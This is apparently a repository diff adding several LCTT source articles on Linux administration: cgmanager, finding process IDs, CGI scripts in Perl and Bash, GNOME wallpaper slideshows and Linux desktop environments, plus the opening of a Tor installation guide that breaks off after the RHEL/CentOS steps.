cgmanager accepts both authentication requests using D-Bus + SCM credentials used for translation of uid, gid and pid across namespaces or using simple "unauthenticated" (just the initial ucred) D-Bus for queries coming from the host level.
|
||||
|
||||
### cgproxy[][4]
|
||||
|
||||
You may see this daemon run in two cases. On the host if your kernel is older than 3.8 (doesn't have pidns attach support) or in containers (where only cgproxy runs).
|
||||
|
||||
cgproxy doesn't itself do any cgroup configuration change but instead as its name indicates, proxies requests to the main cgmanager process.
|
||||
|
||||
This is necessary so a process may talk to /sys/fs/cgroup/cgmanager/sock using straight D-Bus (for example using dbus-send).
|
||||
|
||||
cgproxy will then catch the ucred from that query and do an authenticated SCM query to the real cgmanager socket, passing the arguments through ucred structs so that they get properly translated into something cgmanager in the host namespace can understand.
|
||||
|
||||
### cgm[][5]
|
||||
|
||||
A simple command line tool which talks to the D-Bus service and lets you perform all the usual cgroup operations from the command line.
|
||||
|
||||
# Communication protocol[][6]
|
||||
|
||||
As mentioned above, cgmanager and cgproxy use D-Bus. It's recommended that external clients (so not cgproxy itself) use the standard D-Bus API and do not attempt to implement the SCM creds protocol as it's unnecessary and easy to get wrong.
|
||||
|
||||
Instead, simply assume that talking to /sys/fs/cgroup/cgmanager/sock will always do the right thing.
|
||||
|
||||
The cgmanager API is only available on that separate D-Bus socket, cgmanager itself doesn't attach to the system bus and so a running dbus daemon isn't a requirement of cgmanager/cgproxy.
|
||||
|
||||
You can read more about the D-Bus API [here][7].
|
||||
|
||||
# Licensing[][8]
|
||||
|
||||
CGManager is free software, most of the code is released under the terms of the GNU LGPLv2.1+ license, some binaries are released under the GNU GPLv2 license.
|
||||
|
||||
The default license for the project is the GNU LGPLv2.1+.
|
||||
|
||||
# Support[][9]
|
||||
|
||||
CGManager's stable release support relies on the Linux distributions and their own commitment to pushing stable fixes and security updates.
|
||||
|
||||
Commercial support for CGManager on Ubuntu LTS releases can be obtained from [Canonical Ltd][10].
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://linuxcontainers.org/cgmanager/introduction/
|
||||
|
||||
作者:[Canonical Ltd. ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.canonical.com/
|
||||
[1]:https://linuxcontainers.org/cgmanager/introduction/#whats-cgmanager
|
||||
[2]:https://linuxcontainers.org/cgmanager/introduction/#components
|
||||
[3]:https://linuxcontainers.org/cgmanager/introduction/#cgmanager
|
||||
[4]:https://linuxcontainers.org/cgmanager/introduction/#cgproxy
|
||||
[5]:https://linuxcontainers.org/cgmanager/introduction/#cgm
|
||||
[6]:https://linuxcontainers.org/cgmanager/introduction/#communication-protocol
|
||||
[7]:https://linuxcontainers.org/cgmanager/dbus-api/
|
||||
[8]:https://linuxcontainers.org/cgmanager/introduction/#licensing
|
||||
[9]:https://linuxcontainers.org/cgmanager/introduction/#support
|
||||
[10]:http://www.canonical.com/
|
@ -0,0 +1,105 @@
|
||||
4 Easiest Ways To Find Out Process ID (PID) In Linux
|
||||
======
|
||||
Everybody knows about PIDs, but exactly what is a PID? Why do you want a PID? What are you going to do using a PID? Do you have these same questions on your mind? If so, you are in the right place to get all the details.
|
||||
|
||||
Mainly, we look for a PID to kill an unresponsive program, similar to what the Windows task manager does. Linux GUIs also offer the same feature, but the CLI is an efficient way to perform the kill operation.
|
||||
|
||||
### What Is Process ID?
|
||||
|
||||
PID stands for process identification number which is generally used by most operating system kernels such as Linux, Unix, macOS and Windows. It is a unique identification number that is automatically assigned to each process when it is created in an operating system. A process is a running instance of a program.
|
||||
|
||||
**Suggested Read :** [How To Check Apache Web Server Uptime In Linux][1]
|
||||
|
||||
The process ID changes each time for all processes except init, because init is always the first process on the system and is the ancestor of all other processes. Its PID is 1.
|
||||
|
||||
The default maximum value of PIDs is `32,768`. This can be verified by running the following command on your system: `cat /proc/sys/kernel/pid_max`. On 32-bit systems 32768 is the maximum value, but we can set it to any value up to 2^22 (approximately 4 million) on 64-bit systems.
|
||||
|
||||
You may ask, why do we need such a large number of PIDs? Because we can't reuse PIDs immediately, and also in order to prevent possible errors.
|
||||
|
||||
The PIDs for the running processes on the system can be found by using the pidof command, pgrep command, ps command, and pstree command.
|
||||
|
||||
### Method-1 : Using pidof Command
|
||||
|
||||
pidof is used to find the process ID of a running program. It prints those IDs on the standard output. To demonstrate this, we are going to find out the Apache2 process ID on a Debian 9 (stretch) system.
|
||||
```
|
||||
# pidof apache2
|
||||
3754 2594 2365 2364 2363 2362 2361
|
||||
|
||||
```
|
||||
|
||||
From the above output you may find it difficult to identify the process ID because it shows all the PIDs (including parent and children) against the process name. Hence we need to find out the parent PID (PPID), which is the one we are looking for. It could be the first number. In my case it's `3754`, and the list is sorted in descending order.
|
||||
|
||||
### Method-2 : Using pgrep Command
|
||||
|
||||
pgrep looks through the currently running processes and lists the process IDs which match the selection criteria to stdout.
|
||||
```
|
||||
# pgrep apache2
|
||||
2361
|
||||
2362
|
||||
2363
|
||||
2364
|
||||
2365
|
||||
2594
|
||||
3754
|
||||
|
||||
```
|
||||
|
||||
This is also similar to the above output, but it sorts the results in ascending order, which clearly shows that the parent PID is the last one. In my case it's `3754`.
|
||||
|
||||
**Note :** If you have more than one process ID for the process, you may have trouble identifying the parent process ID when using the pidof & pgrep commands.
|
||||
|
||||
### Method-3 : Using pstree Command
|
||||
|
||||
pstree shows running processes as a tree. The tree is rooted at either pid or init if pid is omitted. If a user name is specified in the pstree command then it shows all the processes owned by the corresponding user.
|
||||
|
||||
pstree visually merges identical branches by putting them in square brackets and prefixing them with the repetition count.
|
||||
```
|
||||
# pstree -p | grep "apache2"
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
| |-apache2(2362)
|
||||
| |-apache2(2363)
|
||||
| |-apache2(2364)
|
||||
| |-apache2(2365)
|
||||
| `-apache2(2594)
|
||||
|
||||
```
|
||||
|
||||
To get parent process alone, use the following format.
|
||||
```
|
||||
# pstree -p | grep "apache2" | head -1
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
|
||||
```
|
||||
|
||||
The pstree command is very simple because it segregates the parent and child processes separately, which is not easy when using the pidof & pgrep commands.
|
||||
|
||||
### Method-4 : Using ps Command
|
||||
|
||||
ps displays information about a selection of the active processes. It displays the process ID (pid=PID), the terminal associated with the process (tname=TTY), the cumulated CPU time in [DD-]hh:mm:ss format (time=TIME), and the executable name (ucmd=CMD). Output is unsorted by default.
|
||||
```
|
||||
# ps aux | grep "apache2"
|
||||
www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start
|
||||
root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start
|
||||
root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2
|
||||
|
||||
```
|
||||
|
||||
From the above output we can easily identify the parent process id (PPID) based on the process start date. In my case apache2 process was started @ `Dec11` which is the parent and others are child's. PID of apache2 is `3754`.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/magesh/
|
||||
[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/
|
@ -0,0 +1,129 @@
|
||||
How to generate webpages using CGI scripts
|
||||
======
|
||||
Back in the stone age of the Internet when I first created my first business website, life was good.
|
||||
|
||||
I installed Apache and created a few simple HTML pages that stated a few important things about my business and gave important information like an overview of my product and how to contact me. It was a static website because the content seldom changed. Maintenance was simple because of the unchanging nature of my site.
|
||||
|
||||
## Static content
|
||||
|
||||
Static content is easy and still common. Let's take a quick look at a couple sample static web pages. You don't need a working website to perform these little experiments. Just place the files in your home directory and open them with your browser. You will see exactly what you would if the file were served to your browser via a web server.
|
||||
|
||||
The first thing you need on a static website is the index.html file which is usually located in the /var/www/html directory. This file can be as simple as a text phrase such as "Hello world" without any HTML markup at all. This would simply display the text string. Create index.html in your home directory and add "Hello world" (without the quotes) as its only content. Open the index.html in your browser with the following URL.
|
||||
```
|
||||
file:///home/<yourhomedirectory>/index.html
|
||||
```
|
||||
|
||||
So HTML is not required, but if you had a large amount of text that needed formatting, the results of a web page with no HTML coding would be incomprehensible with everything running together.
|
||||
|
||||
So the next step is to make the content more readable by using a bit of HTML coding to provide some formatting. The following command creates a page with the absolute minimum markup required for a static web page with HTML. You could also use your favorite editor to create the content.
|
||||
```
|
||||
echo "<h1>Hello World</h1>" > test1.html
|
||||
```
|
||||
|
||||
Now view index.html and see the difference.
|
||||
|
||||
Of course you can put a lot of additional HTML around the actual content line to make a more complete and standard web page. That more complete version as shown below will still display the same results in the browser, but it also forms the basis for more standardized web site. Go ahead and use this content for your index.html file and display it in your browser.
|
||||
```
|
||||
<!DOCTYPE HTML PUBLIC "-//w3c//DD HTML 4.0//EN">
|
||||
<html>
|
||||
<head>
|
||||
<title>My Web Page</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Hello World</h1>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
I built a couple static websites using these techniques, but my life was about to change.
|
||||
|
||||
## Dynamic web pages for a new job
|
||||
|
||||
I took a new job in which my primary task was to create and maintain the CGI ([Common Gateway Interface][6]) code for a very dynamic website. In this context, dynamic means that the HTML needed to produce the web page on a browser was generated from data that could be different every time the page was accessed. This includes input from the user on a web form that is used to look up data in a database. The resulting data is surrounded by appropriate HTML and displayed on the requesting browser. But it does not need to be that complex.
|
||||
|
||||
Using CGI scripts for a website allows you to create simple or complex interactive programs that can be run to provide a dynamic web page that can change based on input, calculations, current conditions in the server, and so on. There are many languages that can be used for CGI scripts. We will look at two of them, Perl and Bash. Other popular CGI languages include PHP and Python.
|
||||
|
||||
This article does not cover installation and setup of Apache or any other web server. If you have access to a web server that you can experiment with, you can directly view the results as they would appear in a browser. Otherwise, you can still run the programs from the command line and view the HTML that would be created. You can also redirect that HTML output to a file and then display the resulting file in your browser.
|
||||
|
||||
### Using Perl
|
||||
|
||||
Perl is a very popular language for CGI scripts. Its strength is that it is a very powerful language for the manipulation of text.
|
||||
|
||||
To get CGI scripts to execute, you need the following line in the in httpd.conf for the website you are using. This tells the web server where your executable CGI files are located. For this experiment, let's not worry about that.
|
||||
```
|
||||
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
|
||||
```
|
||||
|
||||
Add the following Perl code to the file index.cgi, which should be located in your home directory for your experimentation. Set the ownership of the file to apache.apache when you use a web server, and set the permissions to 755 because it must be executable no matter where it is located.
|
||||
|
||||
```
|
||||
#!/usr/bin/perl
|
||||
print "Content-type: text/html\n\n";
|
||||
print "<html><body>\n";
|
||||
print "<h1>Hello World</h1>\n";
|
||||
print "Using Perl<p>\n";
|
||||
print "</body></html>\n";
|
||||
```
|
||||
|
||||
Run this program from the command line and view the results. It should display the HTML code it will generate.
|
||||
|
||||
Now view the index.cgi in your browser. Well, all you get is the contents of the file. Browsers really need to have this delivered as CGI content. Apache does not really know that it needs to run the file as a CGI program unless the Apache configuration for the web site includes the "ScriptAlias" definition as shown above. Without that bit of configuration, Apache simply sends the data in the file to the browser. If you have access to a web server, you could try this out with your executable index files in the /var/www/cgi-bin directory.
|
||||
|
||||
To see what this would look like in your browser, run the program again and redirect the output to a new file. Name it whatever you want. Then use your browser to view the file that contains the generated content.
|
||||
|
||||
The above CGI program is still generating static content because it always displays the same output. Add the following line to your CGI program immediately after the "Hello World" line. The Perl "system" command executes the commands following it in a system shell, and returns the result to the program. In this case, we simply grep the current RAM usage out of the results from the free command.
|
||||
|
||||
```
|
||||
system "free | grep Mem\n";
|
||||
```
|
||||
|
||||
Now run the program again and redirect the output to the results file. Reload the file in the browser. You should see an additional line that displays the system memory statistics. Run the program and refresh the browser a couple more times and notice that the memory usage should change occasionally.
|
||||
|
||||
### Using Bash
|
||||
|
||||
Bash is probably the simplest language of all for use in CGI scripts. Its primary strength for CGI programming is that it has direct access to all of the standard GNU utilities and system programs.
|
||||
|
||||
Rename the existing index.cgi to Perl.index.cgi and create a new index.cgi with the following content. Remember to set the permissions correctly to executable.
|
||||
|
||||
```
|
||||
#!/bin/bash
|
||||
echo "Content-type: text/html"
|
||||
echo ""
|
||||
echo '<html>'
|
||||
echo '<head>'
|
||||
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
|
||||
echo '<title>Hello World</title>'
|
||||
echo '</head>'
|
||||
echo '<body>'
|
||||
echo '<h1>Hello World</h1><p>'
|
||||
echo 'Using Bash<p>'
|
||||
free | grep Mem
|
||||
echo '</body>'
|
||||
echo '</html>'
|
||||
exit 0
|
||||
```
|
||||
|
||||
Execute this program from the command line and view the output, then run it and redirect the output to the temporary results file you created before. Then refresh the browser to view what it looks like displayed as a web page.
|
||||
|
||||
## Conclusion
|
||||
|
||||
It is actually very simple to create CGI programs that can be used to generate a wide range of dynamic web pages. This is a trivial example but you should now see some of the possibilities.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/cgi-scripts
|
||||
|
||||
作者:[David Both][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/dboth
|
||||
[1]:http://december.com/html/4/element/html.html
|
||||
[2]:http://december.com/html/4/element/head.html
|
||||
[3]:http://december.com/html/4/element/title.html
|
||||
[4]:http://december.com/html/4/element/body.html
|
||||
[5]:http://december.com/html/4/element/h1.html
|
||||
[6]:https://en.wikipedia.org/wiki/Common_Gateway_Interface
|
||||
[7]:http://perldoc.perl.org/functions/system.html
|
@ -0,0 +1,101 @@
|
||||
How to set GNOME to display a custom slideshow
|
||||
======
|
||||
A very cool, yet lesser known, feature in GNOME is its ability to display a slideshow as your wallpaper. You can select a wallpaper slideshow from the background settings panel in the [GNOME Control Center][1]. Wallpaper slideshows can be distinguished from static wallpapers by a small clock emblem displayed in the lower-right corner of the preview.
|
||||
|
||||
Some distributions come with pre-installed slideshow wallpapers. For example, Ubuntu includes the stock GNOME timed wallpaper slideshow, as well as one of Ubuntu wallpaper contest winners.
|
||||
|
||||
What if you want to create your own custom slideshow to use as a wallpaper? While GNOME doesn't provide a user interface for this, it's quite simple to create one using some simple XML files in your home directory. Fortunately, the background selection in the GNOME Control Center honors some common directory paths, which makes it easy to create a slideshow without having to edit anything provided by your distribution.
|
||||
|
||||
### Getting started
|
||||
|
||||
Using your favorite text editor, create an XML file in `$HOME/.local/share/gnome-background-properties/`. Although the filename isn't important, the directory name matters (and you'll probably have to create the directory). For my example, I created `/home/ken/.local/share/gnome-background-properties/osdc-wallpapers.xml `with the following content:
|
||||
```
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE wallpapers SYSTEM "gnome-wp-list.dtd">
|
||||
<wallpapers>
|
||||
<wallpaper deleted="false">
|
||||
<name>Opensource.com Wallpapers</name>
|
||||
<filename>/home/ken/Pictures/Wallpapers/osdc/osdc.xml</filename>
|
||||
<options>zoom</options>
|
||||
</wallpaper>
|
||||
</wallpapers>
|
||||
```
|
||||
|
||||
The above XML file needs a `<wallpaper>` stanza for each slideshow or static wallpaper you want to include in the `backgrounds` panel of the GNOME Control Center.
|
||||
|
||||
In this example, my `osdc.xml` file looks like this:
|
||||
|
||||
```
|
||||
<?xml version="1.0" ?>
|
||||
<background>
|
||||
<static>
|
||||
<!-- Duration in seconds to display the background -->
|
||||
<duration>30.0</duration>
|
||||
<file>/home/ken/Pictures/Wallpapers/osdc/osdc_2.png</file>
|
||||
</static>
|
||||
<transition>
|
||||
<!-- Duration of the transition in seconds, default is 2 seconds -->
|
||||
<duration>0.5</duration>
|
||||
<from>/home/ken/Pictures/Wallpapers/osdc/osdc_2.png</from>
|
||||
<to>/home/ken/Pictures/Wallpapers/osdc/osdc_1.png</to>
|
||||
</transition>
|
||||
<static>
|
||||
<duration>30.0</duration>
|
||||
<file>/home/ken/Pictures/Wallpapers/osdc/osdc_1.png</file>
|
||||
</static>
|
||||
<transition>
|
||||
<duration>0.5</duration>
|
||||
<from>/home/ken/Pictures/Wallpapers/osdc/osdc_1.png</from>
|
||||
<to>/home/ken/Pictures/Wallpapers/osdc/osdc_2.png</to>
|
||||
</transition>
|
||||
</background>
|
||||
```
|
||||
|
||||
There are a few important pieces in the above XML. The `<background>` node in the XML is your outer node. Each background supports multiple `<static>` and `<transition>` nodes.
|
||||
|
||||
The `<static>` node defines an image to be displayed and the duration to display it with `<duration>` and `<file>` nodes, respectively.
|
||||
|
||||
The `<transition>` node defines the `<duration>`, the `<from>` image, and the `<to>` image for each transition.
|
||||
|
||||
### Changing wallpaper throughout the day
|
||||
|
||||
Another cool GNOME feature is time-based slideshows. You can define the start time for the slideshow and GNOME will calculate times based on it. This is useful for setting different wallpapers based on the time of day. For example, you could set the start time to 06:00 and display one wallpaper until 12:00, then change it for the afternoon, and again at 18:00.
|
||||
|
||||
This is accomplished by defining the `<starttime>` in your XML like this:
|
||||
```
|
||||
<starttime>
|
||||
<!-- A start time in the past is fine -->
|
||||
<year>2017</year>
|
||||
<month>11</month>
|
||||
<day>21</day>
|
||||
<hour>6</hour>
|
||||
<minute>00</minute>
|
||||
<second>00</second>
|
||||
</starttime>
|
||||
```
|
||||
|
||||
The above XML started the animation at 06:00 on November 21, 2017, with a duration of 21,600.00 seconds, equal to six hours. This displays your morning wallpaper until 12:00, at which time it changes to your next wallpaper. You can continue in this manner to change the wallpaper at any intervals you'd like throughout the day, but ensure the total of all your durations is 86,400 seconds (equal to 24 hours).
|
||||
|
||||
GNOME will calculate the delta between the start time and the current time and display the correct wallpaper for the current time. For example, if you select your new wallpaper at 16:00, GNOME will display the proper wallpaper for 36,000 seconds past the start time of 06:00.
|
||||
|
||||
For a complete example, see the adwaita-timed slideshow provided by the gnome-backgrounds package in most distributions. It's usually found in `/usr/share/backgrounds/gnome/adwaita-timed.xml`.
|
||||
|
||||
### For more information
|
||||
|
||||
Hopefully this encourages you to take a dive into creating your own slideshow wallpapers. If you would like to download complete versions of the files referenced in this article, they can be found on [GitHub][2].
|
||||
|
||||
If you're interested in utility scripts for generating the XML files, you can do an internet search for gnome-background-generator.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/create-your-own-wallpaper-slideshow-gnome
|
||||
|
||||
作者:[Ken Vandine][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/kenvandine
|
||||
[1]:http://manpages.ubuntu.com/manpages/xenial/man1/gnome-control-center.1.html
|
||||
[2]:https://github.com/kenvandine/misc/tree/master/articles/osdc/gnome/slide-show-backgrounds/osdc
|
@ -0,0 +1,108 @@
|
||||
Migrating to Linux: Graphical Environments
|
||||
======
|
||||
This is the third article in our series on migrating to Linux. If you missed earlier articles, they provided an [introduction to Linux for new users][1] and an [overview of Linux files and filesystems][2]. In this article, we'll discuss graphical environments. One of the advantages of Linux is that you have lots of choices, and you can select a graphical interface and customize it to work just the way you like it.
|
||||
|
||||
Some of the popular graphical environments in Linux include: Cinnamon, Gnome, KDE Plasma, Xfce, and MATE, but there are many options.
|
||||
|
||||
One thing that is often confusing to new Linux users is that, although specific Linux distributions have a default graphical environment, usually you can change the graphical interface at any time. This is different from what people are used to with Windows and Mac OS. The distribution and the graphical environment are separate things, and in many cases, they aren't tightly coupled together. Additionally, you can run applications built for one graphical environment inside other graphical environments. For example, an application built for the KDE Plasma graphical interface will typically run just fine in the Gnome desktop graphical environment.
|
||||
|
||||
Some Linux graphical environments try to mimic Microsoft Windows or Apple's MacOS to a degree because that's what some people are familiar with, but other graphical interfaces are unique.
|
||||
|
||||
Below, I'll cover several options showcasing different graphical environments running on different distributions. If you are unsure about which distribution to go with, I recommend starting with [Ubuntu][3]. Get the Long Term Support (LTS) version (which is 16.04.3 at the time of writing). Ubuntu is very stable and easy to use.
|
||||
|
||||
### Transitioning from Mac
|
||||
|
||||
The Elementary OS distribution provides a very Mac-like interface. Its default graphical environment is called Pantheon, and it makes transitioning from a Mac easy. It has a dock at the bottom of the screen and is designed to be extremely simple to use. In its aim to keep things simple, many of the default apps don't even have menus. Instead, there are buttons and controls on the title bar of the application (Figure 1).
|
||||
|
||||
|
||||
![Elementary OS][5]
|
||||
|
||||
Figure 1: Elementary OS with Pantheon.
|
||||
|
||||
The Ubuntu distribution presents a default graphical interface that is also very Mac like. Ubuntu 17.04 or older uses the graphical environment called Unity, which by default places the dock on the left side of the screen and has a global menu bar area at the top that is shared across all applications. Note that newer versions of Ubuntu are switching to the Gnome environment.
|
||||
|
||||
### Transitioning from Windows
|
||||
|
||||
ChaletOS models its interface after Windows to help make migrating from Windows easier. ChaletOS uses the graphical environment called Xfce (Figure 2). It has a home/start menu in the usual lower left corner of the screen with the search bar. There are desktop icons and notifications in the lower right corner. It looks so much like Windows that, at first glance, people may even assume you are running Windows.
|
||||
|
||||
The Zorin OS distribution also tries to mimic Windows. Zorin OS uses the Gnome desktop modified to work like Windows' graphical interface. The start button is at the bottom left with the notification and indicator panel on the lower right. The start button brings up a Windows-like list of applications and a search bar to search.
|
||||
|
||||
### Unique Environments
|
||||
|
||||
One of the most commonly used graphical environments for Linux is the Gnome desktop (Figure 3). Many distributions use Gnome as the default graphical environment. Gnome by default doesn't try to be like Windows or MacOS but aims for elegance and ease of use in its own way.
|
||||
|
||||
The Cinnamon environment was created mostly out of a negative reaction to the Gnome desktop environment when it changed drastically from version 2 to version 3. Although Cinnamon doesn't look like the older Gnome desktop version 2, it attempts to provide a simple interface, which functions somewhat similar to that of Windows XP.
|
||||
|
||||
The graphical environment called MATE is modeled directly after Gnome version 2, which has a menu bar at the top of the screen for applications and settings, and it presents a panel at the bottom of the screen for running application tabs and other widgets.
|
||||
|
||||
The KDE plasma environment is built around a widget interface where widgets can be installed on the desktop or in a panel (Figure 4).
|
||||
|
||||
![KDE Plasma][8]
|
||||
|
||||
Figure 4: Kubuntu with KDE Plasma.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
No graphical environment is better than another. They're just different to suit different people's tastes. And again, if the options seem too much, start with [Ubuntu][3].
|
||||
|
||||
### Differences and Similarities
|
||||
|
||||
Different operating systems do some things differently, which can make the transition challenging. For example, menus may appear in different places and settings may use different paths to access options. Here I list a few things that are similar and different in Linux to help ease the adjustment.
|
||||
|
||||
### Mouse
|
||||
|
||||
The mouse often works differently in Linux than it does in Windows and MacOS. In Windows and Mac, you double-click on most things to open them up. In Linux, many Linux graphical interfaces are set so that you single click on the item to open it.
|
||||
|
||||
Also in Windows, you usually have to click on a window to make it the focused window. In Linux, many interfaces are set so that the focus window is the one under the mouse, even if it's not on top. The difference can be subtle, and sometimes the behavior is surprising. For example, in Windows if you have a background application (not the top window) and you move the mouse over it, without clicking, and scroll the mouse wheel, the top application window will scroll. In Linux, the background window (the one with the mouse over it) will scroll instead.
|
||||
|
||||
### Menus
|
||||
|
||||
Application menus are a staple of computer programs and recently there seems to be a movement to move the menus out of the way or to remove them altogether. So when migrating to Linux, you may not find menus where you expect. The application menu might be in a global shared menu bar like on MacOS. The menu might be below a "more options" icon, similar to those in many mobile applications. Or, the menu may be removed altogether in exchange for buttons, as with some of the apps in the Pantheon environment in Elementary OS.
|
||||
|
||||
### Workspaces
|
||||
|
||||
Many Linux graphical environments present multiple workspaces. A workspace fills your entire screen and contains windows of some running applications. Switching to a different workspace will change which applications are visible. The concept is to group the open applications used for one project together on one workspace and those for another project on a different workspace.
|
||||
|
||||
Not everyone needs or even likes workspaces, but I mention these because sometimes, as a newcomer, you might accidentally switch workspaces with a key combination, and go, "Hey! where'd my applications go?" If all you see is the desktop wallpaper image where you expected to see your apps, chances are you've just switched workspaces, and your programs are still running in a workspace that is now not visible. In many Linux environments, you can switch workspaces by pressing Alt-Ctrl and then an arrow (up, down. left or right). Hopefully, you'll see your programs still there in another workspace.
|
||||
|
||||
Of course, if you happen to like workspaces (many people do), then you have found a useful default feature in Linux.
|
||||
|
||||
### Settings
|
||||
|
||||
Many Linux graphical environments also have some type of settings program or settings panel that let you configure settings on the machine. Note that similarly to Windows and MacOS, things in Linux can be configured in fine detail, and not all of these detailed settings can be found in the settings program. These settings, though, should be enough for most of the things you'll need to set on a typical desktop system, such as selecting the desktop wallpaper, changing how long before the screen goes blank, and connecting to printers, to name a few.
|
||||
|
||||
The settings presented in the application will usually not be grouped the same way or named the same way they are on Windows or MacOS. Even different graphical interfaces in Linux can present settings differently, which may take time to adjust to. Online search, of course, is a great place to search for answers on how to configure things in your graphical environment.
|
||||
|
||||
### Applications
|
||||
|
||||
Finally, applications in Linux might be different. You will likely find some familiar applications but others may be completely new to you. For example, you can find Firefox, Chrome, and Skype on Linux. If you can't find a specific app, there's usually an alternative program you can use. If not, you can run many Windows applications in a compatibility layer called WINE.
|
||||
|
||||
On many Linux graphical environments, you can bring up the applications menu by pressing the Windows Logo key on the keyboard. In others, you need to click on a start/home button or click on an applications menu. In many of the graphical environments, you can search for an application by category rather than by its specific name. For example, if you want to use an editor program but you don't know what it's called, you can bring up the application menu and enter "editor" in the search bar, and it will show you one or more applications that are considered editors.
|
||||
|
||||
To get you started, here is a short list of a few applications and potential Linux alternatives.
|
||||
|
||||
[linux][10]
|
||||
|
||||
Note that this list is by no means comprehensive; Linux offers a multitude of options to meet your needs.
|
||||
|
||||
Learn more about Linux through the free ["Introduction to Linux" ][9]course from The Linux Foundation and edX.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments
|
||||
|
||||
作者:[John Bonesio][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/johnbonesio
|
||||
[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
|
||||
[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
|
||||
[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop
|
||||
[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS)
|
||||
[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma)
|
||||
[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
||||
|
||||
[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj
|
@ -0,0 +1,104 @@
|
||||
translating---geekpi
|
||||
|
||||
Surf anonymously: Learn to install TOR network on Linux
|
||||
======
|
||||
Tor Network is an anonymous network to secure your internet & privacy. Tor network is a group of volunteer operated servers. Tor protects internet communication by bouncing it around a distributed network of relay systems run by volunteers. This prevents people from snooping on our internet traffic: they can't learn what sites we visit or where a user is physically located, and it also allows us to access blocked websites.
|
||||
|
||||
In this tutorial, we will learn to install Tor network on various Linux operating systems & how we can use it to configure our applications to secure the communications.
|
||||
|
||||
**(Recommended Read:[How to install Tor Browser on Linux (Ubuntu, Mint, RHEL, Fedora, CentOS)][1])**
|
||||
|
||||
### CentOS/RHEL/Fedora
|
||||
|
||||
Tor packages are part of EPEL repositories, so we can simply install Tor using yum if we have EPEL repositories installed. If you need to install EPEL repos on your system, use the suitable command (based on OS & Architecture) from the following ,
|
||||
|
||||
**RHEL/CentOS 7**
|
||||
|
||||
**$ sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-11.noarch.rpm**
|
||||
|
||||
**RHEL/CentOS 6 (64 Bit)**
|
||||
|
||||
**$ sudo rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm**
|
||||
|
||||
**RHEL/CentOS 6 (32 Bit)**
|
||||
|
||||
**$ sudo rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm**
|
||||
|
||||
Once installed, we can then install Tor browser with the following command,
|
||||
|
||||
**$ sudo yum install tor**
|
||||
|
||||
### Ubuntu
|
||||
|
||||
